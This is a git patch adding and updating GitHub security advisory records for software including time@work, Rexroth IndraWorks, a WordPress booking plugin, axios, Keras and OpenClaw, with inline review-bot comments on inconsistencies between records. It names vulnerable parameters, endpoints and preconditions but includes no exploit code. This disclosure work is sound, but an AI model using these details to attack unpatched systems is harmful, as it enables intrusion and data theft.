@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whmh-gx62-v47m", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-59920" + ], + "details": "When hours are entered in time@work, version 7.0.5, it performs a query to display the projects assigned to the user. If the query URL is copied and opened in a new browser window, the ‘IDClient’ parameter is vulnerable to a blind authenticated SQL injection. If the request is made with the TWAdmin user with the sysadmin role enabled, exploiting the vulnerability will allow commands to be executed on the system; if the user does not belong to the sysadmin role, they will still be able to query data from the database.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59920" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-timework-systemswork" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json b/advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json new file mode 100644 index 0000000000000..9baadc5170937 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wq2g-h2h9-v8x3", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60038" + ], + "details": "A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running Rexroth IndraWorks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60038" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json b/advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json new file mode 100644 index 0000000000000..c7882935d1b95 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvvh-pcq5-hc6f", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33250" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33250" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33250" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json b/advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json new file mode 100644 index 0000000000000..e9668086651a4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json 
@@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ww2j-3p54-3m69", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-8781" + ], + "details": "The Bookster – WordPress Appointment Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘raw’ parameter in all versions up to, and including, 2.1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8781" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/bookster/trunk/src/Models/Database/QueryBuilder.php#L133" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3434484" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1fc5f0ac-3323-4e6c-8900-10e13294ff9a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T13:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json b/advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json new file mode 100644 index 0000000000000..e42c5f8bdd069 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x536-g6fc-g963", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-2464" + ], + "details": "Path traversal vulnerability in the AMR Printer Management 1.01 Beta web service, which allows remote attackers to read arbitrary files from the underlying Windows system by using specially crafted path traversal sequences in requests directed to the web management service. The service is accessible without authentication and runs with elevated privileges, amplifying the impact of the vulnerability. An attacker can exploit this condition to access sensitive and privileged files on the system using path traversal payloads. Successful exploitation of this vulnerability could lead to the unauthorized disclosure of internal system information, compromising the confidentiality of the affected environment.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2464" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/directory-traversal-amr-printer-management-amr" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:07Z" + } +} \ No newline at end of file From 5c0e07c5b0bb7b24fb941ba52871385af18a7e3a Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 16:11:57 +0000 Subject: [PATCH 007/174] Publish GHSA-xfhx-r7ww-5995 --- .../GHSA-xfhx-r7ww-5995.json | 25 ++++++++++--------- 1 file changed, 13 insertions(+), 12 deletions(-) 
diff --git a/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json b/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json index 2911ab16e66df..98074e802f1ca 100644 --- a/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json +++ b/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-xfhx-r7ww-5995", - "modified": "2026-01-15T20:11:51Z", + "modified": "2026-02-18T16:08:35Z", "published": "2026-01-15T15:31:19Z", "aliases": [ "CVE-2026-0897" ], "summary": "Google Keras Allocates Resources Without Limits or Throttling in the HDF5 weight loading component", - "details": "Allocation of Resources Without Limits or Throttling in the HDF5 weight loading component in Google Keras 3.0.0 through 3.13.0 on all platforms allows a remote attacker to cause a Denial of Service (DoS) through memory exhaustion and a crash of the Python interpreter via a crafted .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape.", + "details": "Allocation of Resources Without Limits or Throttling in the HDF5 weight loading component in Google Keras 3.0.0 through 3.12.0 and 3.13.0 on all platforms allows a remote attacker to cause a Denial of Service (DoS) through memory exhaustion and a crash of the Python interpreter via a crafted .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape.", "severity": [ { "type": "CVSS_V4", @@ -28,14 +28,11 @@ "introduced": "3.0.0" }, { - "fixed": "3.13.1" + "fixed": "3.12.1" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 3.13.0" - } + ] }, { "package": { 
@@ -47,17 +44,17 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0.0" + "introduced": "3.13.0" }, { - "fixed": "3.12.1" + "fixed": "3.13.1" } ] } ], - "database_specific": { - "last_known_affected_version_range": "<= 3.12.0" - } + "versions": [ + "3.13.0" + ] } ], "references": [ @@ -77,6 +74,10 @@ "type": "WEB", "url": "https://github.com/keras-team/keras/commit/7360d4f0d764fbb1fa9c6408fe53da41974dd4f6" }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/commit/f704c887bf459b42769bfc8a9182f838009afddb" + }, { "type": "PACKAGE", "url": "https://github.com/keras-team/keras" From 2e5cf78652535edad64ebb74d32eca54d553f9e7 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 17:16:44 +0000 Subject: [PATCH 008/174] Publish GHSA-43fc-jf86-j433 --- .../GHSA-43fc-jf86-j433.json | 38 ++++++++++++++++++- 1 file changed, 36 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json b/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json index a7d9702027908..c42b11fa1c57f 100644 --- a/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json +++ b/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-43fc-jf86-j433", - "modified": "2026-02-09T22:39:32Z", + "modified": "2026-02-18T17:15:11Z", "published": "2026-02-09T17:46:14Z", "aliases": [ "CVE-2026-25639" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { "fixed": "1.13.5" 
@@ -36,6 +36,28 @@ "database_specific": { "last_known_affected_version_range": "<= 1.13.4" } + }, + { + "package": { + "ecosystem": "npm", + "name": "axios" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.30.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.30.2" + } } ], "references": [ @@ -51,14 +73,26 @@ "type": "WEB", "url": "https://github.com/axios/axios/pull/7369" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/pull/7388" + }, { "type": "WEB", "url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e" + }, { "type": "PACKAGE", "url": "https://github.com/axios/axios" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/releases/tag/v0.30.0" + }, { "type": "WEB", "url": "https://github.com/axios/axios/releases/tag/v1.13.5" From 0bb5d2b0ebfa02dc8ba10c97a461b9018a24ccaf Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 17:39:15 +0000 Subject: [PATCH 009/174] Publish Advisories GHSA-gq9c-wg68-gwj2 GHSA-xwjm-j929-xq7c --- .../GHSA-gq9c-wg68-gwj2.json | 63 +++++++++++++++++ .../GHSA-xwjm-j929-xq7c.json | 68 +++++++++++++++++++ 2 files changed, 131 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-gq9c-wg68-gwj2/GHSA-gq9c-wg68-gwj2.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json diff --git a/advisories/github-reviewed/2026/02/GHSA-gq9c-wg68-gwj2/GHSA-gq9c-wg68-gwj2.json b/advisories/github-reviewed/2026/02/GHSA-gq9c-wg68-gwj2/GHSA-gq9c-wg68-gwj2.json new file mode 100644 index 0000000000000..210f1edb3906b --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-gq9c-wg68-gwj2/GHSA-gq9c-wg68-gwj2.json 
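Review bot: The release reference added in the `@@ -51,14 +73,26 @@` hunk, `https://github.com/axios/axios/releases/tag/v0.30.0`, does not line up with the new 0.x range added in the `@@ -36,6 +36,28 @@` hunk, which declares `"fixed": "0.30.3"` and `"last_known_affected_version_range": "<= 0.30.2"`. By the record's own range, 0.30.0 is still an affected version, so a reader who follows that link for remediation lands on a release the advisory marks as vulnerable. If the 0.x fix shipped in 0.30.3, the reference should presumably point at that release's tag instead; confirm against the axios release list before changing it.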
@@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gq9c-wg68-gwj2", + "modified": "2026-02-18T17:38:39Z", + "published": "2026-02-18T17:38:39Z", + "aliases": [], + "summary": "OpenClaw has a path traversal in browser trace/download output paths may allow arbitrary file writes", + "details": "## Summary\n\n OpenClaw’s browser control API accepted user-supplied output paths for trace/download files without consistently\n constraining writes to OpenClaw-managed temporary directories.\n\n ## Impact\n\n If an attacker can access the browser control API, they could attempt to write trace/download output files outside\n intended temp roots, depending on process filesystem permissions.\n\n ## Affected versions\n\n `openclaw` `< 2026.2.13`\n\n ## Fixed versions\n\n `openclaw` `>= 2026.2.13`\n\n ## Remediation\n\n Upgrade to `2026.2.13` or later.\n\n ## What changed\n\n The fix constrains output paths for:\n\n - `POST /trace/stop`\n - `POST /wait/download`\n - `POST /download`\n\n All three now enforce OpenClaw temp-root boundaries and reject traversal/escape paths.\n\n ## Credits\n\n Thanks to Adnan Jakati (@jackhax) of Praetorian for responsible disclosure.\n\n Fix shipped in PR #15652 and merged to `main` on February 13, 2026 (`7f0489e4731c8d965d78d6eac4a60312e46a9426`).\n\n---\n\nFix commit 7f0489e4731c8d965d78d6eac4a60312e46a9426 confirmed on main and in v2026.2.14. 
Upgrade to `openclaw >= 2026.2.13`.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gq9c-wg68-gwj2" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/15652" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/7f0489e4731c8d965d78d6eac4a60312e46a9426" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:38:39Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json b/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json new file mode 100644 index 0000000000000..cbafa16a3039d --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json 
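Review bot: This record (GHSA-gq9c-wg68-gwj2) and GHSA-xwjm-j929-xq7c, published in the same commit, both cover the `/wait/download` and `/download` output-path traversal and cite the same fix commit `7f0489e4731c8d965d78d6eac4a60312e46a9426`, yet they disagree on scope and exposure. Here the range starts at `"introduced": "0"` and the vector is `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N` (HIGH). The sibling starts at `"introduced": "2026.1.12"`, states that exploitation needs authenticated CLI access or a gateway RPC token, and scores `CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H` (MODERATE). Anyone matching on `openclaw` gets two findings with different severities for overlapping code paths, so the details should say which routes or preconditions are unique to this record; `POST /trace/stop` is named only here. For consistency with the sibling, the affected entry could also carry `"database_specific": { "last_known_affected_version_range": "<= 2026.2.12" }`.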
@@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwjm-j929-xq7c", + "modified": "2026-02-18T17:37:53Z", + "published": "2026-02-18T17:37:52Z", + "aliases": [ + "CVE-2026-26972" + ], + "summary": "OpenClaw has a Path Traversal in Browser Download Functionality", + "details": "### Summary\n\nOpenClaw browser download helpers accepted an unsanitized output path. When invoked via the browser control gateway routes, this allowed path traversal to write downloads outside the intended OpenClaw temp downloads directory.\n\nThis issue is not exposed via the AI agent tool schema (no `download` action). Exploitation requires authenticated CLI access or an authenticated gateway RPC token.\n\n### Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: >=2026.1.12, <=2026.2.12\n- Fixed: >=2026.2.13\n\n### Details\n\nAffected code: `src/browser/pw-tools-core.downloads.ts` (`waitForDownloadViaPlaywright`, `downloadViaPlaywright`).\n\nFixed entrypoints (as of 2026.2.13):\n- Gateway browser control routes `/wait/download` and `/download` now restrict `path` to `DEFAULT_DOWNLOAD_DIR` via `resolvePathWithinRoot`.\n\n### Fix Commit(s)\n\n- 7f0489e4731c8d965d78d6eac4a60312e46a9426\n\n### Mitigation\n\nUpgrade to `openclaw` >=2026.2.13.\n\nThanks @locus-x64 for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2026.1.12" + }, + { + "fixed": "2026.2.13" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2026.2.12" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xwjm-j929-xq7c" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/7f0489e4731c8d965d78d6eac4a60312e46a9426" + }, + { + "type": 
"PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.13" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:37:52Z", + "nvd_published_at": null + } +} \ No newline at end of file From 0083c7c33098b09fa9955cedbc145423abd69ad5 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 17:41:32 +0000 Subject: [PATCH 010/174] Publish Advisories GHSA-4564-pvr2-qq4h GHSA-7rcp-mxpq-72pj --- .../GHSA-4564-pvr2-qq4h.json | 75 +++++++++++++++++++ .../GHSA-7rcp-mxpq-72pj.json | 63 ++++++++++++++++ 2 files changed, 138 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-7rcp-mxpq-72pj/GHSA-7rcp-mxpq-72pj.json diff --git a/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json new file mode 100644 index 0000000000000..48068a265fa55 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json 
@@ -0,0 +1,75 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4564-pvr2-qq4h", + "modified": "2026-02-18T17:39:00Z", + "published": "2026-02-18T17:39:00Z", + "aliases": [], + "summary": "OpenClaw: Prevent shell injection in macOS keychain credential write", + "details": "## Summary\nOn macOS, the Claude CLI keychain credential refresh path constructed a shell command to write the updated JSON blob into Keychain via `security add-generic-password -w ...`. Because OAuth tokens are user-controlled data, this created an OS command injection risk.\n\nThe fix avoids invoking a shell by using `execFileSync(\"security\", argv)` and passing the updated keychain payload as a literal argument.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Platform: macOS only\n- Affected versions: `<= 2026.2.13`\n\n## Fix\n- Patched version: `>= 2026.2.14` (next release)\n- Fix PR: #15924\n- Fix commits (merged to `main`):\n - `9dce3d8bf83f13c067bc3c32291643d2f1f10a06`\n - `66d7178f2d6f9d60abad35797f97f3e61389b70c`\n - `b908388245764fb3586859f44d1dff5372b19caf`\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4564-pvr2-qq4h" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/15924" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/66d7178f2d6f9d60abad35797f97f3e61389b70c" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/9dce3d8bf83f13c067bc3c32291643d2f1f10a06" + }, + { + "type": "WEB", + "url": 
"https://github.com/openclaw/openclaw/commit/b908388245764fb3586859f44d1dff5372b19caf" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:39:00Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-7rcp-mxpq-72pj/GHSA-7rcp-mxpq-72pj.json b/advisories/github-reviewed/2026/02/GHSA-7rcp-mxpq-72pj/GHSA-7rcp-mxpq-72pj.json new file mode 100644 index 0000000000000..ef9734b768201 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-7rcp-mxpq-72pj/GHSA-7rcp-mxpq-72pj.json 
@@ -0,0 +1,63 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7rcp-mxpq-72pj",
+ "modified": "2026-02-18T17:41:00Z",
+ "published": "2026-02-18T17:41:00Z",
+ "aliases": [],
+ "summary": "OpenClaw Chutes manual OAuth state validation bypass can cause credential substitution",
+ "details": "## Summary\n\nThe manual Chutes OAuth login flow could accept attacker-controlled callback input in a way that bypassed OAuth CSRF state validation, potentially resulting in credential substitution.\n\n## Impact\n\nIf an attacker can convince a user to paste attacker-provided OAuth callback data during the manual login prompt, OpenClaw may exchange an attacker-obtained authorization code and persist tokens for the wrong Chutes account.\n\nThe automatic local callback flow is not affected (it validates state in the local HTTP callback handler).\n\n## Affected Packages / Versions\n\n- `openclaw` (npm): `<= 2026.2.13` when using the manual Chutes OAuth login flow.\n\n## Fix\n\nThe manual flow now requires the full redirect URL (must include `code` and `state`), validates the returned `state` against the expected value, and rejects code-only pastes.\n\n## Fix Commit(s)\n\n- a99ad11a4107ba8eac58f54a3c1a8a0cf5686f47\n\nThanks @aether-ai-agent for reporting.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "openclaw"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2026.2.14"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7rcp-mxpq-72pj"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/commit/a99ad11a4107ba8eac58f54a3c1a8a0cf5686f47"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/openclaw/openclaw"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-18T17:41:00Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
From 175bf9cac5b7529888405cc533d680f8a7e95f9b Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com>
Date: Wed, 18 Feb 2026 17:43:25 +0000
Subject: [PATCH 011/174] Publish GHSA-jfv4-h8mc-jcp8
---
.../GHSA-jfv4-h8mc-jcp8.json | 67 +++++++++++++++++++
1 file changed, 67 insertions(+)
create mode 100644 advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json
diff --git a/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json b/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json
new file mode 100644
index 0000000000000..95b14dd073959
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json
@@ -0,0 +1,67 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jfv4-h8mc-jcp8",
+ "modified": "2026-02-18T17:41:09Z",
+ "published": "2026-02-18T17:41:09Z",
+ "aliases": [],
+ "summary": "OpenClaw: Process Safety - Unvalidated PID Kill via SIGKILL in Process Cleanup",
+ "details": "## Summary\n\nOpenClaw CLI process cleanup used system-wide process enumeration and pattern matching to terminate processes without verifying they were owned by the current OpenClaw process. On shared hosts, unrelated processes could be terminated if they matched the pattern.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `< 2026.2.14` (including the latest published version `2026.2.13`)\n- Fixed: `2026.2.14` (planned next release)\n\n## Details\n\nThe CLI runner cleanup helpers could kill processes matched by command-line patterns without validating process ownership.\n\n## Fix\n\nProcess cleanup is now scoped to owned processes only by filtering to direct child PIDs of the current process (`ppid == process.pid`) before sending signals.\n\nHardening follow-ups:\n- Prefer graceful termination for resume cleanup (`SIGTERM`, then `SIGKILL` fallback).\n- Reduce false negatives from `ps` argv truncation by preferring wide output (`ps -axww`) with a fallback.\n- Tighten command-line token matching to avoid substring matches.\n\n## Fix Commit(s)\n\n- 6084d13b956119e3cf95daaf9a1cae1670ea3557\n- eb60e2e1b213740c3c587a7ba4dbf10da620ca66\n\n## Release Process Note\n\nThis advisory is pre-set with patched version `2026.2.14`. After `2026.2.14` is published to npm, the remaining step should be to publish this advisory.\n\nThanks @aether-ai-agent for reporting.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
